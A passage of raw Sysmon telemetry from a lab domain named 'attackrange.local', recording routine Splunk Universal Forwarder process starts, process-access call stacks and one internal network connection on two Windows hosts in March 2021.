Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245238Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.281{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-512E-6063-9E22-00000000AF01}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245237Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.282{CB4067E1-512E-6063-9E22-00000000AF01}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245236Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:22.187{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27164C128CBBA3F5FA1B8B5EE5D5196F,SHA256=6FB672155F56E547E388C9F285CCAAF00A991922ED882565E3AE2E1BB7CC7251,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060654Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:20.067{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54752-false10.0.1.12-8000- 10341000x8000000000000000245280Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.734{CB4067E1-512F-6063-A022-00000000AF01}6362764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245279Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.625{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-512F-6063-A022-00000000AF01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245278Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.625{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245277Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.625{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245276Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.625{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245275Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.625{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245274Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.625{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245273Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.625{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245272Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.625{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245271Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.625{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245270Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.625{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245269Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.625{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-512F-6063-A022-00000000AF01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245268Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.625{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-512F-6063-A022-00000000AF01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245267Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.625{CB4067E1-512F-6063-A022-00000000AF01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245266Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.422{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B72EBB899B29F1D6C9228EB18794F7A7,SHA256=8729A06934E4D2EA0E0BF12F7D651B19F34D59566AF4C97E30ACC60C19DB8611,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245265Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.422{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=056A0182B416C3FA7755037656C8141A,SHA256=2A3C62E9898A5F1EBC1CC4922C0932F09F45A5DED07CCB1E8C9317D099DB3961,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000245264Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:23.062{CB4067E1-512E-6063-9F22-00000000AF01}27283708C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060673Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.844{7F8C56E7-5130-6063-0F01-00000000AF01}56164640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060672Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.703{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5130-6063-0F01-00000000AF01}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060671Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.703{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060670Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.703{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060669Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.703{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060668Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.703{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060667Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.703{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-5130-6063-0F01-00000000AF01}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060666Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:24.703{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5130-6063-0F01-00000000AF01}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060665Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 